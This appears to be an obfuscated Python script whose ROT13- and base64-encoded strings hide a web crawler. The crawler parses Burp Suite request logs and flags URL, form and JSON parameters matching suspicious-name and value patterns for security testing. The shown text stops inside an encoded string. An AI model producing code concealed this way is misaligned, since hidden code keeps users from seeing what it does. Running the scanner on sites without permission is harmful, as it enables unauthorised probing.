love = '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'
god = 'X3VybD0gcmUuZmluZGFsbCgiKFw/fFwmKShbXj1dKylcPShbXiZdKykiLGxpbmtVcmwpCgkJCQlnZXRfcmVxPWxpbmtVcmwucnNwbGl0KCc/JywxKQoJCQkJdXJsPWdldF9yZXFbMF0KCQkJCXBhcmFtZXRlcnM9Z2V0X3JlcVsxXQoKCQkJCWlmIHBvc3QgYW5kIHVybCBub3QgaW4gcG9zdF90aHJvd0F3YXlHZXRSZXFzOgoJCQkJCXBvc3RfdGhyb3dBd2F5R2V0UmVxc1t1cmxdPXBhcmFtZXRlcnMKCQkJCWVsaWYgbm90IHBvc3QgYW5kIHVybCBub3QgaW4gZ2V0X3Rocm93QXdheUdldFJlcXM6CgkJCQkJZ2V0X3Rocm93QXdheUdldFJlcXNbdXJsXT1wYXJhbWV0ZXJzCgkJCQllbHNlOgoJCQkJCWlmIHBvc3Q6CgkJCQkJCWV4aXN0aW5nUGFyYW1zPXBvc3RfdGhyb3dBd2F5R2V0UmVxc1t1cmxdCgkJCQkJZWxzZToKCQkJCQkJZXhpc3RpbmdQYXJhbXM9Z2V0X3Rocm93QXdheUdldFJlcXNbdXJsXQoKCQkJCQlhbGxQYXJhbWV0ZXJFeGlzdHMgPSBGYWxzZQoJCQkJCWZvciBwYXJhbXMgaW4gY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw6CgkJCQkJCQkjU29tZSBwYXJhbSBuYW1lcyBoYXZlIHNwZWNpYWwgY2hhcnMgd2UgbmVlZCB0byBlc2NhcGUgdGhlbSBhbmQgdGhlbiBzZWFyY2gKCQkJCQkJCWZvcm1pbmdSZWdleD1yZS5lc2NhcGUocGFyYW1zWzFdKQoJCQkJCQkJaWYgcmUuc2VhcmNoKGZvcm1pbmdSZWdleCxleGlzdGluZ1BhcmFtcyxyZS5JKToKCQkJCQkJCQkJYWxsUGFyYW1ldGVyRXhpc3RzPVRydWUKCQkJCQkJCWVsc2U6CgkJCQkJCQkJCWFsbFBhcmFtZXRlckV4aXN0cz1GYWxzZQoJCQkJCWlmIGFsbFBhcmFtZXRlckV4aXN0czoKCQkJCQkJCXFfYnVycC50YXNrX2RvbmUoKQoJCQkJCQkJY29udGludWUKCQkJCQllbHNlOgoJCQkJCQlpZiBwb3N0OgoJCQkJCQkJcG9zdF90aHJvd0F3YXlHZXRSZXFzW3VybF09cGFyYW1ldGVycwoJCQkJCQllbHNlOgoJCQkJCQkJZ2V0X3Rocm93QXdheUdldFJlcXNbdXJsXT1wYXJhbWV0ZXJzCgkJCSNBY3R1YWwgUHJvY2Vzc2luZyBvZiByZXF1ZXN0cyBzdGFydHMsIGp1c3QgY2hlY2tpbmcgZm9yIDIwMCBzdGF0dXMJCQkJCgkJCWlmIGl0ZW0uZmluZCgnc3RhdHVzJykudGV4dD09IjIwMCIgYW5kIGl0ZW0uZmluZCgnbWV0aG9kJykudGV4dD09IlBPU1QiOgoJCQkJI1NwZWNpYWwgY29uZGl0aW9uIGZvciBoYW5kbGluZyBVUkwgcGFyYW1ldGVycyBpbiBwb3N0IHJlcXVlc3QgdG8gc2VuZCB0aGVtIAoJCQkJaWYgIj8iIGluIGxpbmtVcmw6CgkJCQkJY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw9IHJlLmZpbmRhbGwoIihcP3xcJikoW149XSspXD0oW14mXSspIixsaW5rVXJsKQoKCQkJCQkjQ2hlY2tpbmcgaWYgdGhlcmUgaXMgYSBwYXJhbWF0ZXIgaW4gdGhlIFVSTCAoVGhpcyB3b3VsZCBmaWx0ZXIgcmVzdCBBUElzIGluIHRoZSBmb3JtYXQgL3Rlc3QvMSAvdGVzdC8yKQoJCQkJCWlmIG5vdCBsZW4oY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmwpPT0wOgoJCQkJCQkjR2V0dGluZyB0aGUgcGFyY
W0gdmFsdWVzIHBhcmFtc1syXSBhbmQgcGFyYW0gbmFtZSBwYXJhbXNbMV0gYW5kIG1hdGNoaW5nIGFnYWluc3QgcmVnZXgKCQkJCQkJZm9yIHBhcmFtcyBpbiBjaGVja2luZ19wYXJhbXNfZm9yX3VybDoKCQkJCQkJCW1hdGNoVVJMS2V5d29yZHNJbk5hbWUoIlBPU1QiLHBhcmFtc1sxXSxsaW5rVXJsKQoJCQkJCQkJbWF0Y2hVUkxQYXR0ZXJuSW5WYWx1ZSgiUE9TVCIscGFyYW1zWzFdLHBhcmFtc1syXSxsaW5rVXJsKQoKCQkJCXJlc3BvbnNlPWJhc2U2NC5iNjRkZWNvZGUoaXRlbS5maW5kKCdyZXF1ZXN0JykudGV4dCkuZGVjb2RlKCJ1dGY4IikKCQkJCWNvbnRlbnRfdHlwZV9yZWdleD0nXFxyXFxuQ29udGVudC1UeXBlOiguKj8pXFxyXFxuJwoJCQkJaWYgcmUuc2VhcmNoKGNvbnRlbnRfdHlwZV9yZWdleCxyZXNwb25zZSk6CgkJCQkJY29udGVudF90eXBlID0gKHJlLnNlYXJjaChjb250ZW50X3R5cGVfcmVnZXgscmVzcG9uc2UpLmdyb3VwKDEpKQoKCQkJCWlmICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiIGluIGNvbnRlbnRfdHlwZToKCQkJCQlmb3JtX3JlZ2V4PSdcXHJcXG5cXHJcXG4oLiopJwoJCQkJCXJlc3BvbnNlPXVybGxpYi5wYXJzZS51bnF1b3RlKHJlc3BvbnNlKQoJCQkJCWlmIHJlLnNlYXJjaChmb3JtX3JlZ2V4LHJlc3BvbnNlKToKCQkJCQkJZm9ybV9yZXE9cmUuc2VhcmNoKGZvcm1fcmVnZXgscmVzcG9uc2UpLmdyb3VwKDEpCgkJCQkJCWNoZWNraW5nX3BhcmFtc19mb3JfdXJsPSByZS5maW5kYWxsKCIoXCYpPyhbXj1dKylcPShbXiZdKykiLGZvcm1fcmVxKQoJCQkJCQkgI0NoZWNraW5nIGlmIHRoZXJlIGlzIGEgcGFyYW1hdGVyIGluIHRoZSBVUkwgKFRoaXMgd291bGQgZmlsdGVyIHJlc3QgQVBJcyBpbiB0aGUgZm9ybWF0IC90ZXN0LzEgL3Rlc3QvMikKCQkJCQkJaWYgbm90IGxlbihjaGVja2luZ19wYXJhbXNfZm9yX3VybCk9PTA6CgkJCQkJCQkjR2V0dGluZyB0aGUgcGFyYW0gdmFsdWVzIHBhcmFtc1syXSBhbmQgcGFyYW0gbmFtZSBwYXJhbXNbMV0gYW5kIG1hdGNoaW5nIGFnYWluc3QgcmVnZXgKCQkJCQkJCWZvciBwYXJhbXMgaW4gY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw6CgkJCQkJCQkJI3ByaW50IChwYXJhbXNbMV0pCgkJCQkJCQkJYnVycF9tYXRjaFVSTEtleXdvcmRzSW5OYW1lKCJQT1NUIixwYXJhbXNbMV0sbGlua1VybCkKCQkJCQkJCQlidXJwX21hdGNoVVJMUGF0dGVybkluVmFsdWUoIlBPU1QiLHBhcmFtc1sxXSxwYXJhbXNbMl0sbGlua1VybCkKCQkJCWVsaWYgImpzb24iIGluIGNvbnRlbnRfdHlwZToKCQkJCQkjcHJpbnQgKHVybGxpYi5wYXJzZS51bnF1b3RlKHJlc3BvbnNlKSkKCQkJCQlqc29uX3JlZ2V4PSdcXHJcXG5cXHJcXG4oeygufFxuKSp9KScKCQkJCQlpZiByZS5zZWFyY2goanNvbl9yZWdleCxyZXNwb25zZSk6CgkJCQkJCWpzb25fcmVxPXVybGxpYi5wYXJzZS51bnF1b3RlKHJlLnNlYXJjaChqc29uX3JlZ2V4LHJlc3BvbnNlKS5ncm91cCgxKSkKCQkJCQkJI
3ByaW50IChqc29uX3JlcSkKCQkJCQkJanNvbl9yZXE9anNvbl9yZXEucmVwbGFjZSgnXG4nLCAnJykucmVwbGFjZSgnXHInLCAnJykKCQkJCQkJZm9yIGtleSx2YWx1ZSBpbiBqc29uLmxvYWRzKGpzb25fcmVxKS5pdGVtcygpOgoJCQkJCQkJYnVycF9tYXRjaFVSTEtleXdvcmRzSW5OYW1lKCJQT1NUIixrZXksbGlua1VybCkKCQkJCQkJCWJ1cnBfbWF0Y2hVUkxQYXR0ZXJuSW5WYWx1ZSgiUE9TVCIsa2V5LHZhbHVlLGxpbmtVcmwpCgkJCQkjVE9ETwoJCQkJZWxpZiAieG1sIiBpbiBjb250ZW50X3R5cGU6CgkJCQkJcHJpbnQgKCIiKQoKCQkJZWxpZiBpdGVtLmZpbmQoJ3N0YXR1cycpLnRleHQ9PSIyMDAiIGFuZCBpdGVtLmZpbmQoJ21ldGhvZCcpLnRleHQ9PSJHRVQiOgoJCQkJY2hlY2tpbmdfcGFyYW1zX2Zvcl91cmw9IHJlLmZpbmRhbGwoIihcP3xcJikoW149XSspXD0oW14mXSspIixsaW5rVXJsKQoKCQkJCSNDaGVja2luZyBpZiB0aGVyZSBpcyBhIHBhcmFtYXRlciBpbiB0aGUgVVJMIChUaGlzIHdvdWxkIGZpbHRlciByZXN0IEFQSXMgaW4gdGhlIGZvcm1hdCAvdGVzdC8xIC90ZXN0LzIpCgkJCQlpZiBub3QgbGVuKGNoZWNraW5nX3BhcmFtc19mb3JfdXJsKT09MDoKCQkJCQkjR2V0dGluZyB0aGUgcGFyYW0gdmFsdWVzIHBhcmFtc1syXSBhbmQgcGFyYW0gbmFtZSBwYXJhbXNbMV0gYW5kIG1hdGNoaW5nIGFnYWluc3QgcmVnZXgKCQkJCQlmb3IgcGFyYW1zIGluIGNoZWNraW5nX3BhcmFtc19mb3JfdXJsOgoJCQkJCQlidXJwX21hdGNoVVJMS2V5d29yZHNJbk5hbWUoIkdFVCIscGFyYW1zWzFdLGxpbmtVcmwpCgkJCQkJCWJ1cnBfbWF0Y2hVUkxQYXR0ZXJuSW5WYWx1ZSgiR0VUIixwYXJhbXNbMV0scGFyYW1zWzJdLGxpbmtVcmwpCgkJCQkKCQkJCSNBZGRpbmcgdGhlIGxpbmsgZm91bmQgdG8gZG8gYmFzaWMgY3Jhd2xpbmcgdG8gZ2V0IG1heGltdW0gcmVzdWx0cwoJCQkJcS5wdXQobGlua1VybCkKCQkJcV9idXJwLnRhc2tfZG9uZSgpCgkJZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgoJCQlwcmludChlKQoJCQlxX2J1cnAudGFza19kb25lKCkKCQkJY29udGludWUKCQkJCmRlZiBiYXNpY0NyYXdsaW5nKHVybCk6CglpZiBhcmdzLmNvb2tpZXM6CgkJciA9IHJlcXVlc3RzLmdldCh1cmwsIGNvb2tpZXM9Y29va2llc0RpY3QpCgllbHNlOgoJCXIgPSByZXF1ZXN0cy5nZXQodXJsKQoJc2l0ZUNvbnRlbnQ9ci50ZXh0CglpZiB1cmwgbm90IGluIGxpbmtzVmlzaXRlZDoKCQljaGVja0Zvcm1QYXJhbWV0ZXJzKHNpdGVDb250ZW50LHVybCkKCQljaGVja0ZvckdldFJlcXVlc3QodXJsKQoJCWxpbmtzVmlzaXRlZC5hZGQodXJsKQoJCQkKCQlmb3IgbGlua3MgaW4gQmVhdXRpZn'
destiny = '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
